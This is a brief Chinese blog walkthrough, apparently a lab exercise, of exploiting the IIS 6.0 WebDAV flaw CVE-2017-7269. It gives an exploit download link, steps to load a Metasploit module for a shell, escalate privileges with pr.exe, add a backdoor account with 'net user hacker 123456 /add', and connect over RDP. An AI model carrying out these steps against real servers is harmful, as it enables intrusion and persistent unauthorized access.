（CVE-2017-7269 ） IIS6.0实现远程控制

（CVE-2017-7269 ） IIS6.0实现远程控制
简介

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁

利用条件

Windows 2003 R2开启WebDAV服务的IIS6.0

环境搭建
1. Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
2. Exp下载地址：https://github.com/zcgonvh/cve-2017-7269
3. pr.exe提权工具
4. 3389.bat
漏洞利用

第一步：IIS开启WebDAV

第二步：Cp cve-2017-7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

第三步：使用模块,设置参数

第四步：开始攻击,获得一个shell，获得的是一个低权限用户

第五步：上传pr.exe到目标服务器上

第六步：pr.exe "net user hacker 123456 /add"
第七步：rdesktop 192.168.0.135 连接3389
相关阅读:
Web API中的消息处理程序（Message Handler）
Web API中的模型验证
 autoconf配置的项目，编译debug版本
 gcc编译工具生成动态库和静态库之一----介绍
 VMware中四种网络连接模式的区别
 vmware虚拟机三种网络模式的区别
 code block自动生成makefile
centos7 安装 codeblock(rpm)
利用cbmakegen导出Code::blocks的Makefile
C/C++程序CPU问题分析
原文地址：https://www.cnblogs.com/daiorz/p/12009783.html